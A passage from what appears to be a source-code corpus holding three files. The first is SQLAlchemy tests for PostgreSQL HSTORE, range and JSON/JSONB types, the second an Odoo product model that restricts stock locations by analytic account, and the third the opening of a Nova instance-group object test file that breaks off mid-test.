            "hstore_to_matrix(test_table.hash) AS hstore_to_matrix_1",
            True
        )
class HStoreRoundTripTest(fixtures.TablesTest):
    # Live round-trip tests for HSTORE, run against both the driver's
    # native hstore support and the pure-Python fallback serializer.
    __requires__ = 'hstore',
    __dialect__ = 'postgresql'
    __backend__ = True
    @classmethod
    def define_tables(cls, metadata):
        Table('data_table', metadata,
              Column('id', Integer, primary_key=True),
              Column('name', String(30), nullable=False),
              Column('data', HSTORE)
              )
    def _fixture_data(self, engine):
        # five rows r1..r5, each with a two-key hstore value
        data_table = self.tables.data_table
        engine.execute(
            data_table.insert(),
            {'name': 'r1', 'data': {"k1": "r1v1", "k2": "r1v2"}},
            {'name': 'r2', 'data': {"k1": "r2v1", "k2": "r2v2"}},
            {'name': 'r3', 'data': {"k1": "r3v1", "k2": "r3v2"}},
            {'name': 'r4', 'data': {"k1": "r4v1", "k2": "r4v2"}},
            {'name': 'r5', 'data': {"k1": "r5v1", "k2": "r5v2"}},
        )
    def _assert_data(self, compare):
        # compare the 'data' column of all rows, ordered by name
        data = testing.db.execute(
            select([self.tables.data_table.c.data]).
            order_by(self.tables.data_table.c.name)
        ).fetchall()
        eq_([d for d, in data], compare)
    def _test_insert(self, engine):
        engine.execute(
            self.tables.data_table.insert(),
            {'name': 'r1', 'data': {"k1": "r1v1", "k2": "r1v2"}}
        )
        self._assert_data([{"k1": "r1v1", "k2": "r1v2"}])
    def _non_native_engine(self):
        # return an engine with native hstore disabled, forcing the
        # pure-Python serializer; falls back to the default engine when the
        # driver has no native support anyway
        if testing.requires.psycopg2_native_hstore.enabled:
            engine = engines.testing_engine(
                options=dict(
                    use_native_hstore=False))
        else:
            engine = testing.db
        engine.connect().close()
        return engine
    def test_reflect(self):
        insp = inspect(testing.db)
        cols = insp.get_columns('data_table')
        assert isinstance(cols[2]['type'], HSTORE)
    @testing.requires.psycopg2_native_hstore
    def test_insert_native(self):
        engine = testing.db
        self._test_insert(engine)
    def test_insert_python(self):
        engine = self._non_native_engine()
        self._test_insert(engine)
    @testing.requires.psycopg2_native_hstore
    def test_criterion_native(self):
        engine = testing.db
        self._fixture_data(engine)
        self._test_criterion(engine)
    def test_criterion_python(self):
        engine = self._non_native_engine()
        self._fixture_data(engine)
        self._test_criterion(engine)
    def _test_criterion(self, engine):
        # filter on a single hstore key via the -> operator
        data_table = self.tables.data_table
        result = engine.execute(
            select([data_table.c.data]).where(
                data_table.c.data['k1'] == 'r3v1')).first()
        eq_(result, ({'k1': 'r3v1', 'k2': 'r3v2'},))
    def _test_fixed_round_trip(self, engine):
        # build an hstore from parallel key/value arrays server-side and
        # read it back as a dict
        s = select([
            hstore(
                array(['key1', 'key2', 'key3']),
                array(['value1', 'value2', 'value3'])
            )
        ])
        eq_(
            engine.scalar(s),
            {"key1": "value1", "key2": "value2", "key3": "value3"}
        )
    def test_fixed_round_trip_python(self):
        engine = self._non_native_engine()
        self._test_fixed_round_trip(engine)
    @testing.requires.psycopg2_native_hstore
    def test_fixed_round_trip_native(self):
        engine = testing.db
        self._test_fixed_round_trip(engine)
    def _test_unicode_round_trip(self, engine):
        # non-ASCII keys and values must survive the round trip
        s = select([
            hstore(
                array([util.u('réveillé'), util.u('drôle'), util.u('S’il')]),
                array([util.u('réveillé'), util.u('drôle'), util.u('S’il')])
            )
        ])
        eq_(
            engine.scalar(s),
            {
                util.u('réveillé'): util.u('réveillé'),
                util.u('drôle'): util.u('drôle'),
                util.u('S’il'): util.u('S’il')
            }
        )
    @testing.requires.psycopg2_native_hstore
    def test_unicode_round_trip_python(self):
        engine = self._non_native_engine()
        self._test_unicode_round_trip(engine)
    @testing.requires.psycopg2_native_hstore
    def test_unicode_round_trip_native(self):
        engine = testing.db
        self._test_unicode_round_trip(engine)
    def test_escaped_quotes_round_trip_python(self):
        engine = self._non_native_engine()
        self._test_escaped_quotes_round_trip(engine)
    @testing.requires.psycopg2_native_hstore
    def test_escaped_quotes_round_trip_native(self):
        engine = testing.db
        self._test_escaped_quotes_round_trip(engine)
    def _test_escaped_quotes_round_trip(self, engine):
        # keys/values containing backslashes and quotes must round-trip
        engine.execute(
            self.tables.data_table.insert(),
            {'name': 'r1', 'data': {r'key \"foo\"': r'value \"bar"\ xyz'}}
        )
        self._assert_data([{r'key \"foo\"': r'value \"bar"\ xyz'}])
    def test_orm_round_trip(self):
        # HSTORE values flush and load correctly through a classical ORM
        # mapping as well
        from sqlalchemy import orm
        class Data(object):
            def __init__(self, name, data):
                self.name = name
                self.data = data
        orm.mapper(Data, self.tables.data_table)
        s = orm.Session(testing.db)
        d = Data(name='r1', data={"key1": "value1", "key2": "value2",
                                  "key3": "value3"})
        s.add(d)
        eq_(
            s.query(Data.data, Data).all(),
            [(d.data, d)]
        )
class _RangeTypeMixin(object):
    # Shared test body for the PG range types. Concrete subclasses provide:
    #   _col_type  - the SQLAlchemy type class (e.g. INT4RANGE)
    #   _col_str   - the expected DDL string (e.g. 'INT4RANGE')
    #   _data_str  - a textual range literal for inserts/criteria
    #   _data_obj()- the equivalent psycopg2 range object
    __requires__ = 'range_types', 'psycopg2_compatibility'
    __backend__ = True
    def extras(self):
        # done this way so we don't get ImportErrors with
        # older psycopg2 versions.
        if testing.against("postgresql+psycopg2cffi"):
            from psycopg2cffi import extras
        else:
            from psycopg2 import extras
        return extras
    @classmethod
    def define_tables(cls, metadata):
        # no reason ranges shouldn't be primary keys,
        # so lets just use them as such
        table = Table('data_table', metadata,
                      Column('range', cls._col_type, primary_key=True),
                      )
        cls.col = table.c.range
    def test_actual_type(self):
        eq_(str(self._col_type()), self._col_str)
    def test_reflect(self):
        from sqlalchemy import inspect
        insp = inspect(testing.db)
        cols = insp.get_columns('data_table')
        assert isinstance(cols[0]['type'], self._col_type)
    def _assert_data(self):
        # the table must contain exactly one row holding _data_obj()
        data = testing.db.execute(
            select([self.tables.data_table.c.range])
        ).fetchall()
        eq_(data, [(self._data_obj(), )])
    def test_insert_obj(self):
        testing.db.engine.execute(
            self.tables.data_table.insert(),
            {'range': self._data_obj()}
        )
        self._assert_data()
    def test_insert_text(self):
        # the textual literal form must coerce to the same stored value
        testing.db.engine.execute(
            self.tables.data_table.insert(),
            {'range': self._data_str}
        )
        self._assert_data()
    # operator tests
    def _test_clause(self, colclause, expected):
        # compile-only check of the rendered operator SQL
        dialect = postgresql.dialect()
        compiled = str(colclause.compile(dialect=dialect))
        eq_(compiled, expected)
    def test_where_equal(self):
        self._test_clause(
            self.col == self._data_str,
            "data_table.range = %(range_1)s"
        )
    def test_where_not_equal(self):
        self._test_clause(
            self.col != self._data_str,
            "data_table.range <> %(range_1)s"
        )
    def test_where_less_than(self):
        self._test_clause(
            self.col < self._data_str,
            "data_table.range < %(range_1)s"
        )
    def test_where_greater_than(self):
        self._test_clause(
            self.col > self._data_str,
            "data_table.range > %(range_1)s"
        )
    def test_where_less_than_or_equal(self):
        self._test_clause(
            self.col <= self._data_str,
            "data_table.range <= %(range_1)s"
        )
    def test_where_greater_than_or_equal(self):
        self._test_clause(
            self.col >= self._data_str,
            "data_table.range >= %(range_1)s"
        )
    def test_contains(self):
        self._test_clause(
            self.col.contains(self._data_str),
            "data_table.range @> %(range_1)s"
        )
    def test_contained_by(self):
        self._test_clause(
            self.col.contained_by(self._data_str),
            "data_table.range <@ %(range_1)s"
        )
    def test_overlaps(self):
        self._test_clause(
            self.col.overlaps(self._data_str),
            "data_table.range && %(range_1)s"
        )
    def test_strictly_left_of(self):
        # both the << operator and its named method render the same SQL
        self._test_clause(
            self.col << self._data_str,
            "data_table.range << %(range_1)s"
        )
        self._test_clause(
            self.col.strictly_left_of(self._data_str),
            "data_table.range << %(range_1)s"
        )
    def test_strictly_right_of(self):
        self._test_clause(
            self.col >> self._data_str,
            "data_table.range >> %(range_1)s"
        )
        self._test_clause(
            self.col.strictly_right_of(self._data_str),
            "data_table.range >> %(range_1)s"
        )
    def test_not_extend_right_of(self):
        self._test_clause(
            self.col.not_extend_right_of(self._data_str),
            "data_table.range &< %(range_1)s"
        )
    def test_not_extend_left_of(self):
        self._test_clause(
            self.col.not_extend_left_of(self._data_str),
            "data_table.range &> %(range_1)s"
        )
    def test_adjacent_to(self):
        self._test_clause(
            self.col.adjacent_to(self._data_str),
            "data_table.range -|- %(range_1)s"
        )
    def test_union(self):
        self._test_clause(
            self.col + self.col,
            "data_table.range + data_table.range"
        )
    def test_union_result(self):
        # range + range of the same value is the value itself
        # insert
        testing.db.engine.execute(
            self.tables.data_table.insert(),
            {'range': self._data_str}
        )
        # select
        range = self.tables.data_table.c.range
        data = testing.db.execute(
            select([range + range])
        ).fetchall()
        eq_(data, [(self._data_obj(), )])
    def test_intersection(self):
        self._test_clause(
            self.col * self.col,
            "data_table.range * data_table.range"
        )
    def test_intersection_result(self):
        # range * range of the same value is the value itself
        # insert
        testing.db.engine.execute(
            self.tables.data_table.insert(),
            {'range': self._data_str}
        )
        # select
        range = self.tables.data_table.c.range
        data = testing.db.execute(
            select([range * range])
        ).fetchall()
        eq_(data, [(self._data_obj(), )])
    def test_different(self):
        self._test_clause(
            self.col - self.col,
            "data_table.range - data_table.range"
        )
    def test_difference_result(self):
        # range - itself yields the empty range of the same class
        # insert
        testing.db.engine.execute(
            self.tables.data_table.insert(),
            {'range': self._data_str}
        )
        # select
        range = self.tables.data_table.c.range
        data = testing.db.execute(
            select([range - range])
        ).fetchall()
        eq_(data, [(self._data_obj().__class__(empty=True), )])
class Int4RangeTests(_RangeTypeMixin, fixtures.TablesTest):
    """Concrete range-type suite for INT4RANGE."""
    _col_type = INT4RANGE
    _col_str = 'INT4RANGE'
    _data_str = '[1,2)'
    def _data_obj(self):
        # psycopg2 object equivalent of _data_str
        extras = self.extras()
        return extras.NumericRange(1, 2)
class Int8RangeTests(_RangeTypeMixin, fixtures.TablesTest):
    """Concrete range-type suite for INT8RANGE, using bounds near the
    64-bit signed maximum."""
    _col_type = INT8RANGE
    _col_str = 'INT8RANGE'
    _data_str = '[9223372036854775806,9223372036854775807)'
    def _data_obj(self):
        # psycopg2 object equivalent of _data_str
        extras = self.extras()
        return extras.NumericRange(
            9223372036854775806, 9223372036854775807
        )
class NumRangeTests(_RangeTypeMixin, fixtures.TablesTest):
    """Concrete range-type suite for NUMRANGE (Decimal bounds)."""
    _col_type = NUMRANGE
    _col_str = 'NUMRANGE'
    _data_str = '[1.0,2.0)'
    def _data_obj(self):
        # psycopg2 object equivalent of _data_str
        extras = self.extras()
        return extras.NumericRange(
            decimal.Decimal('1.0'), decimal.Decimal('2.0')
        )
class DateRangeTests(_RangeTypeMixin, fixtures.TablesTest):
    """Concrete range-type suite for DATERANGE."""
    _col_type = DATERANGE
    _col_str = 'DATERANGE'
    _data_str = '[2013-03-23,2013-03-24)'
    def _data_obj(self):
        # psycopg2 object equivalent of _data_str
        extras = self.extras()
        return extras.DateRange(
            datetime.date(2013, 3, 23), datetime.date(2013, 3, 24)
        )
class DateTimeRangeTests(_RangeTypeMixin, fixtures.TablesTest):
    """Concrete range-type suite for TSRANGE (timezone-naive)."""
    _col_type = TSRANGE
    _col_str = 'TSRANGE'
    _data_str = '[2013-03-23 14:30,2013-03-23 23:30)'
    def _data_obj(self):
        # psycopg2 object equivalent of _data_str
        extras = self.extras()
        return extras.DateTimeRange(
            datetime.datetime(2013, 3, 23, 14, 30),
            datetime.datetime(2013, 3, 23, 23, 30)
        )
class DateTimeTZRangeTests(_RangeTypeMixin, fixtures.TablesTest):
    """Concrete range-type suite for TSTZRANGE (timezone-aware)."""
    _col_type = TSTZRANGE
    _col_str = 'TSTZRANGE'
    # make sure we use one, steady timestamp with timezone pair
    # for all parts of all these tests
    _tstzs = None
    def tstzs(self):
        # lazily compute and cache a single (lower, upper) pair, where
        # upper is exactly one day after the server's current timestamp
        if self._tstzs is None:
            lower = testing.db.scalar(
                func.current_timestamp().select()
            )
            self._tstzs = (lower, lower + datetime.timedelta(1))
        return self._tstzs
    @property
    def _data_str(self):
        # textual form of the cached pair, e.g. '[<lower>,<upper>)'
        lower, upper = self.tstzs()
        return '[%s,%s)' % (lower, upper)
    def _data_obj(self):
        # psycopg2 object equivalent of _data_str
        extras = self.extras()
        return extras.DateTimeTZRange(*self.tstzs())
class JSONTest(AssertsCompiledSQL, fixtures.TestBase):
    """SQL-compilation and bind/result-processor tests for the PG JSON type.

    Subclassed by JSONBTest, which swaps the column type for JSONB.
    """

    __dialect__ = 'postgresql'

    def setup(self):
        # Build a fresh one-JSON-column table fixture for every test.
        metadata = MetaData()
        self.test_table = Table('test_table', metadata,
                                Column('id', Integer, primary_key=True),
                                Column('test_column', JSON),
                                )
        self.jsoncol = self.test_table.c.test_column

    def _test_where(self, whereclause, expected):
        """Assert *whereclause* renders as *expected* in the WHERE clause."""
        stmt = select([self.test_table]).where(whereclause)
        self.assert_compile(
            stmt,
            "SELECT test_table.id, test_table.test_column FROM test_table "
            "WHERE %s" % expected
        )

    def _test_cols(self, colclause, expected, from_=True):
        """Assert *colclause* renders as *expected* in the column list."""
        stmt = select([colclause])
        self.assert_compile(
            stmt,
            (
                "SELECT %s" +
                (" FROM test_table" if from_ else "")
            ) % expected
        )

    def test_bind_serialize_default(self):
        # By default Python values are serialized to a JSON string.
        dialect = postgresql.dialect()
        proc = self.test_table.c.test_column.type._cached_bind_processor(
            dialect)
        eq_(
            proc({"A": [1, 2, 3, True, False]}),
            '{"A": [1, 2, 3, true, false]}'
        )

    def test_bind_serialize_None(self):
        # Python None becomes the JSON 'null' value, not SQL NULL.
        dialect = postgresql.dialect()
        proc = self.test_table.c.test_column.type._cached_bind_processor(
            dialect)
        eq_(
            proc(None),
            'null'
        )

    def test_bind_serialize_none_as_null(self):
        # With none_as_null=True both None and null() map to SQL NULL.
        dialect = postgresql.dialect()
        proc = JSON(none_as_null=True)._cached_bind_processor(
            dialect)
        eq_(
            proc(None),
            None
        )
        eq_(
            proc(null()),
            None
        )

    def test_bind_serialize_null(self):
        # An explicit null() construct always yields SQL NULL.
        dialect = postgresql.dialect()
        proc = self.test_table.c.test_column.type._cached_bind_processor(
            dialect)
        eq_(
            proc(null()),
            None
        )

    def test_result_deserialize_default(self):
        # Result strings are parsed back into Python structures.
        dialect = postgresql.dialect()
        proc = self.test_table.c.test_column.type._cached_result_processor(
            dialect, None)
        eq_(
            proc('{"A": [1, 2, 3, true, false]}'),
            {"A": [1, 2, 3, True, False]}
        )

    def test_result_deserialize_null(self):
        # The JSON text 'null' deserializes to Python None.
        dialect = postgresql.dialect()
        proc = self.test_table.c.test_column.type._cached_result_processor(
            dialect, None)
        eq_(
            proc('null'),
            None
        )

    def test_result_deserialize_None(self):
        # SQL NULL (Python None) passes through untouched.
        dialect = postgresql.dialect()
        proc = self.test_table.c.test_column.type._cached_result_processor(
            dialect, None)
        eq_(
            proc(None),
            None
        )

    # This test is a bit misleading -- in real life you will need to cast to
    # do anything
    def test_where_getitem(self):
        self._test_where(
            self.jsoncol['bar'] == None,
            "(test_table.test_column -> %(test_column_1)s) IS NULL"
        )

    def test_where_path(self):
        # A tuple index renders the #> path-extraction operator.
        self._test_where(
            self.jsoncol[("foo", 1)] == None,
            "(test_table.test_column #> %(test_column_1)s) IS NULL"
        )

    def test_where_getitem_as_text(self):
        # .astext renders the ->> text-extraction operator.
        self._test_where(
            self.jsoncol['bar'].astext == None,
            "(test_table.test_column ->> %(test_column_1)s) IS NULL"
        )

    def test_where_getitem_as_cast(self):
        self._test_where(
            self.jsoncol['bar'].cast(Integer) == 5,
            "CAST(test_table.test_column ->> %(test_column_1)s AS INTEGER) "
            "= %(param_1)s"
        )

    def test_where_path_as_text(self):
        # Tuple index plus .astext renders the #>> operator.
        self._test_where(
            self.jsoncol[("foo", 1)].astext == None,
            "(test_table.test_column #>> %(test_column_1)s) IS NULL"
        )

    def test_cols_get(self):
        self._test_cols(
            self.jsoncol['foo'],
            "test_table.test_column -> %(test_column_1)s AS anon_1",
            True
        )
class JSONRoundTripTest(fixtures.TablesTest):
    """Round trips Python data through a real JSON column on PG >= 9.3.

    Each scenario is exercised twice where relevant: once against the
    "native" psycopg2 JSON handling and once against a non-native engine
    where SQLAlchemy's own Python-level (de)serializers run.  Subclassed
    by JSONBRoundTripTest with ``test_type = JSONB``.
    """

    __only_on__ = ('postgresql >= 9.3',)
    __backend__ = True
    test_type = JSON

    @classmethod
    def define_tables(cls, metadata):
        # 'nulldata' maps Python None to SQL NULL instead of JSON null.
        Table('data_table', metadata,
              Column('id', Integer, primary_key=True),
              Column('name', String(30), nullable=False),
              Column('data', cls.test_type),
              Column('nulldata', cls.test_type(none_as_null=True))
              )

    def _fixture_data(self, engine):
        """Populate data_table with five predictable rows r1..r5."""
        data_table = self.tables.data_table
        engine.execute(
            data_table.insert(),
            {'name': 'r1', 'data': {"k1": "r1v1", "k2": "r1v2"}},
            {'name': 'r2', 'data': {"k1": "r2v1", "k2": "r2v2"}},
            {'name': 'r3', 'data': {"k1": "r3v1", "k2": "r3v2"}},
            {'name': 'r4', 'data': {"k1": "r4v1", "k2": "r4v2"}},
            {'name': 'r5', 'data': {"k1": "r5v1", "k2": "r5v2", "k3": 5}},
        )

    def _assert_data(self, compare, column='data'):
        """Assert the column's values, ordered by name, equal *compare*."""
        col = self.tables.data_table.c[column]
        data = testing.db.execute(
            select([col]).
            order_by(self.tables.data_table.c.name)
        ).fetchall()
        eq_([d for d, in data], compare)

    def _assert_column_is_NULL(self, column='data'):
        """Assert exactly one row whose column value is SQL NULL."""
        col = self.tables.data_table.c[column]
        data = testing.db.execute(
            select([col]).
            where(col.is_(null()))
        ).fetchall()
        eq_([d for d, in data], [None])

    def _test_insert(self, engine):
        engine.execute(
            self.tables.data_table.insert(),
            {'name': 'r1', 'data': {"k1": "r1v1", "k2": "r1v2"}}
        )
        self._assert_data([{"k1": "r1v1", "k2": "r1v2"}])

    def _test_insert_nulls(self, engine):
        engine.execute(
            self.tables.data_table.insert(),
            {'name': 'r1', 'data': null()}
        )
        self._assert_data([None])

    def _test_insert_none_as_null(self, engine):
        engine.execute(
            self.tables.data_table.insert(),
            {'name': 'r1', 'nulldata': None}
        )
        self._assert_column_is_NULL(column='nulldata')

    def _non_native_engine(self, json_serializer=None, json_deserializer=None):
        """Return an engine that bypasses psycopg2's native JSON handling.

        On psycopg2 >= 2.5 this registers a pass-through loads() on each
        connection and clears the dialect's native-json flag so that
        SQLAlchemy's result processors do the deserialization instead.
        """
        if json_serializer is not None or json_deserializer is not None:
            options = {
                "json_serializer": json_serializer,
                "json_deserializer": json_deserializer
            }
        else:
            options = {}
        if testing.against("postgresql+psycopg2") and \
                testing.db.dialect.psycopg2_version >= (2, 5):
            from psycopg2.extras import register_default_json
            engine = engines.testing_engine(options=options)

            @event.listens_for(engine, "connect")
            def connect(dbapi_connection, connection_record):
                engine.dialect._has_native_json = False

                def pass_(value):
                    return value
                register_default_json(dbapi_connection, loads=pass_)
        elif options:
            engine = engines.testing_engine(options=options)
        else:
            engine = testing.db
        # Force a connection so the connect-event side effects run now.
        engine.connect().close()
        return engine

    def test_reflect(self):
        insp = inspect(testing.db)
        cols = insp.get_columns('data_table')
        assert isinstance(cols[2]['type'], self.test_type)

    @testing.requires.psycopg2_native_json
    def test_insert_native(self):
        engine = testing.db
        self._test_insert(engine)

    @testing.requires.psycopg2_native_json
    def test_insert_native_nulls(self):
        engine = testing.db
        self._test_insert_nulls(engine)

    @testing.requires.psycopg2_native_json
    def test_insert_native_none_as_null(self):
        engine = testing.db
        self._test_insert_none_as_null(engine)

    def test_insert_python(self):
        engine = self._non_native_engine()
        self._test_insert(engine)

    def test_insert_python_nulls(self):
        engine = self._non_native_engine()
        self._test_insert_nulls(engine)

    def test_insert_python_none_as_null(self):
        engine = self._non_native_engine()
        self._test_insert_none_as_null(engine)

    def _test_custom_serialize_deserialize(self, native):
        """Round trip with user-supplied dumps/loads.

        The marker key 'x' ends up as 'dumps_y_loads' only if both custom
        hooks actually ran, proving they were wired into the engine.
        """
        import json

        def loads(value):
            value = json.loads(value)
            value['x'] = value['x'] + '_loads'
            return value

        def dumps(value):
            value = dict(value)
            value['x'] = 'dumps_y'
            return json.dumps(value)
        if native:
            engine = engines.testing_engine(options=dict(
                json_serializer=dumps,
                json_deserializer=loads
            ))
        else:
            engine = self._non_native_engine(
                json_serializer=dumps,
                json_deserializer=loads
            )
        s = select([
            cast(
                {
                    "key": "value",
                    "x": "q"
                },
                self.test_type
            )
        ])
        eq_(
            engine.scalar(s),
            {
                "key": "value",
                "x": "dumps_y_loads"
            },
        )

    @testing.requires.psycopg2_native_json
    def test_custom_native(self):
        self._test_custom_serialize_deserialize(True)

    @testing.requires.psycopg2_native_json
    def test_custom_python(self):
        self._test_custom_serialize_deserialize(False)

    @testing.requires.psycopg2_native_json
    def test_criterion_native(self):
        engine = testing.db
        self._fixture_data(engine)
        self._test_criterion(engine)

    def test_criterion_python(self):
        engine = self._non_native_engine()
        self._fixture_data(engine)
        self._test_criterion(engine)

    def test_path_query(self):
        engine = testing.db
        self._fixture_data(engine)
        data_table = self.tables.data_table
        result = engine.execute(
            select([data_table.c.data]).where(
                data_table.c.data[('k1',)].astext == 'r3v1'
            )
        ).first()
        eq_(result, ({'k1': 'r3v1', 'k2': 'r3v2'},))

    def test_query_returned_as_text(self):
        engine = testing.db
        self._fixture_data(engine)
        data_table = self.tables.data_table
        result = engine.execute(
            select([data_table.c.data['k1'].astext])
        ).first()
        assert isinstance(result[0], util.text_type)

    def test_query_returned_as_int(self):
        engine = testing.db
        self._fixture_data(engine)
        data_table = self.tables.data_table
        result = engine.execute(
            select([data_table.c.data['k3'].cast(Integer)]).where(
                data_table.c.name == 'r5')
        ).first()
        assert isinstance(result[0], int)

    def _test_criterion(self, engine):
        data_table = self.tables.data_table
        result = engine.execute(
            select([data_table.c.data]).where(
                data_table.c.data['k1'].astext == 'r3v1'
            )
        ).first()
        eq_(result, ({'k1': 'r3v1', 'k2': 'r3v2'},))

    def _test_fixed_round_trip(self, engine):
        # A nested literal dict must come back structurally identical.
        s = select([
            cast(
                {
                    "key": "value",
                    "key2": {"k1": "v1", "k2": "v2"}
                },
                self.test_type
            )
        ])
        eq_(
            engine.scalar(s),
            {
                "key": "value",
                "key2": {"k1": "v1", "k2": "v2"}
            },
        )

    def test_fixed_round_trip_python(self):
        engine = self._non_native_engine()
        self._test_fixed_round_trip(engine)

    @testing.requires.psycopg2_native_json
    def test_fixed_round_trip_native(self):
        engine = testing.db
        self._test_fixed_round_trip(engine)

    def _test_unicode_round_trip(self, engine):
        # Non-ASCII keys and values must survive the round trip.
        s = select([
            cast(
                {
                    util.u('réveillé'): util.u('réveillé'),
                    "data": {"k1": util.u('drôle')}
                },
                self.test_type
            )
        ])
        eq_(
            engine.scalar(s),
            {
                util.u('réveillé'): util.u('réveillé'),
                "data": {"k1": util.u('drôle')}
            },
        )

    def test_unicode_round_trip_python(self):
        engine = self._non_native_engine()
        self._test_unicode_round_trip(engine)

    @testing.requires.psycopg2_native_json
    def test_unicode_round_trip_native(self):
        engine = testing.db
        self._test_unicode_round_trip(engine)
class JSONBTest(JSONTest):
    """Repeats the JSON compilation tests against JSONB and adds the
    JSONB-only existence/containment operators."""

    def setup(self):
        metadata = MetaData()
        self.test_table = Table('test_table', metadata,
                                Column('id', Integer, primary_key=True),
                                Column('test_column', JSONB)
                                )
        self.jsoncol = self.test_table.c.test_column

    # Note - add fixture data for arrays []

    def test_where_has_key(self):
        # Key-existence operator ?
        self._test_where(
            # hide from 2to3
            getattr(self.jsoncol, 'has_key')('data'),
            "test_table.test_column ? %(test_column_1)s"
        )

    def test_where_has_all(self):
        # All-keys-exist operator ?&
        self._test_where(
            self.jsoncol.has_all(
                {'name': 'r1', 'data': {"k1": "r1v1", "k2": "r1v2"}}),
            "test_table.test_column ?& %(test_column_1)s")

    def test_where_has_any(self):
        # Any-key-exists operator ?|
        self._test_where(
            self.jsoncol.has_any(postgresql.array(['name', 'data'])),
            "test_table.test_column ?| ARRAY[%(param_1)s, %(param_2)s]"
        )

    def test_where_contains(self):
        # Containment operator @>
        self._test_where(
            self.jsoncol.contains({"k1": "r1v1"}),
            "test_table.test_column @> %(test_column_1)s"
        )

    def test_where_contained_by(self):
        # Contained-by operator <@
        self._test_where(
            self.jsoncol.contained_by({'foo': '1', 'bar': None}),
            "test_table.test_column <@ %(test_column_1)s"
        )
class JSONBRoundTripTest(JSONRoundTripTest):
    """Re-runs the JSON round-trip suite against JSONB on PG >= 9.4.

    The unicode round trips additionally require a UTF-8 server encoding.
    """

    test_type = JSONB
    __only_on__ = ('postgresql >= 9.4',)
    __requires__ = ('postgresql_jsonb', )

    @testing.requires.postgresql_utf8_server_encoding
    def test_unicode_round_trip_python(self):
        super(JSONBRoundTripTest, self).test_unicode_round_trip_python()

    @testing.requires.postgresql_utf8_server_encoding
    def test_unicode_round_trip_native(self):
        super(JSONBRoundTripTest, self).test_unicode_round_trip_native()
| mit |
sysadminmatmoz/pmis | stock_analytic_account/model/product.py | 1 | 1712 | # -*- coding: utf-8 -*-
# Copyright 2014-17 Eficent Business and IT Consulting Services S.L.
# Copyright 2016 Matmoz d.o.o.
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl.html).
from odoo import models
class Product(models.Model):
    _inherit = "product.product"

    def _get_domain_locations(self):
        """Restrict quant/move location domains by analytic account.

        When the context carries ``analytic_account_id`` (or
        ``analytic_account_id_out``), the standard location domains are
        replaced so stock quantities are computed only against locations
        linked to that analytic account.  Returns the usual triple
        ``(dom_quant, dom_loc_in, dom_loc_out)``.
        """
        if self._context.get('analytic_account_id'):
            # All stock locations linked to the requested analytic account.
            locations = self.env['stock.location'].search(
                [('analytic_account_id', '=', self._context.get(
                    'analytic_account_id'))]).ids
            # Quants and outgoing moves filter on location_id; incoming
            # moves on location_dest_id.
            dom_loc_out = dom_quant = [('location_id', 'in', locations)]
            dom_loc_in = [('location_dest_id', 'in', locations)]
            return (dom_quant, dom_loc_in, dom_loc_out)
        elif self._context.get('analytic_account_id_out'):
            # NOTE(review): this branch appears to target stock sitting at
            # customer locations for the analytic account -- confirm with
            # the callers that pass 'analytic_account_id_out'.
            locations = self.env['stock.location'].search(
                [('analytic_account_id', '=', self._context.get(
                    'analytic_account_id_out'))]).ids
            customer_locations = self.env['stock.location'].search(
                [('usage', '=', 'customer')]).ids
            # Moves between the account's locations and customer locations.
            dom_loc_out = [('location_dest_id', 'in', locations),
                           ('location_id', 'in', customer_locations), ]
            dom_loc_in = [('location_dest_id', 'in', customer_locations),
                          ('location_id', 'in', locations), ]
            dom_quant = [
                ('location_id', 'in', customer_locations),
                ('analytic_account_id', '=',
                 self._context.get('analytic_account_id_out'))
            ]
            return (dom_quant, dom_loc_in, dom_loc_out)
        else:
            # No analytic filter requested: defer to the standard logic.
            return super(Product, self)._get_domain_locations()
| agpl-3.0 |
felixma/nova | nova/tests/unit/objects/test_instance_group.py | 27 | 14526 | # Copyright (c) 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import uuid
import mock
from oslo_utils import timeutils
from nova import exception
from nova import objects
from nova.tests.unit.objects import test_objects
# Fixed "now" reused for every timestamp field in the fixture below.
_TS_NOW = timeutils.utcnow(with_timezone=True)
# o.vo.fields.DateTimeField converts to tz-aware and
# in process we lose microsecond resolution.
_TS_NOW = _TS_NOW.replace(microsecond=0)

# Stable UUID identifying the fixture instance group.
_DB_UUID = str(uuid.uuid4())

# Canonical instance-group row as the DB layer would return it.
_INST_GROUP_DB = {
    'id': 1,
    'uuid': _DB_UUID,
    'user_id': 'fake_user',
    'project_id': 'fake_project',
    'name': 'fake_name',
    'policies': ['policy1', 'policy2'],
    'members': ['instance_id1', 'instance_id2'],
    'deleted': False,
    'created_at': _TS_NOW,
    'updated_at': _TS_NOW,
    'deleted_at': None,
    }
class _TestInstanceGroupObject(object):
    """Shared InstanceGroup object tests.

    Run twice via the subclasses below: once against the local object
    backend and once through the remote (serialized) backend.
    """

    @mock.patch('nova.db.instance_group_get', return_value=_INST_GROUP_DB)
    def test_get_by_uuid(self, mock_db_get):
        obj = objects.InstanceGroup.get_by_uuid(mock.sentinel.ctx,
                                                _DB_UUID)
        mock_db_get.assert_called_once_with(mock.sentinel.ctx, _DB_UUID)
        self.assertEqual(_INST_GROUP_DB['members'], obj.members)
        self.assertEqual(_INST_GROUP_DB['policies'], obj.policies)
        self.assertEqual(_DB_UUID, obj.uuid)
        self.assertEqual(_INST_GROUP_DB['project_id'], obj.project_id)
        self.assertEqual(_INST_GROUP_DB['user_id'], obj.user_id)
        self.assertEqual(_INST_GROUP_DB['name'], obj.name)

    @mock.patch('nova.db.instance_group_get_by_instance',
                return_value=_INST_GROUP_DB)
    def test_get_by_instance_uuid(self, mock_db_get):
        objects.InstanceGroup.get_by_instance_uuid(
            mock.sentinel.ctx, mock.sentinel.instance_uuid)
        mock_db_get.assert_called_once_with(
            mock.sentinel.ctx, mock.sentinel.instance_uuid)

    @mock.patch('nova.db.instance_group_get')
    def test_refresh(self, mock_db_get):
        # The second DB read returns a changed row; refresh() must pick it
        # up and leave the object with no pending changes.
        changed_group = copy.deepcopy(_INST_GROUP_DB)
        changed_group['name'] = 'new_name'
        mock_db_get.side_effect = [_INST_GROUP_DB, changed_group]
        obj = objects.InstanceGroup.get_by_uuid(mock.sentinel.ctx,
                                                _DB_UUID)
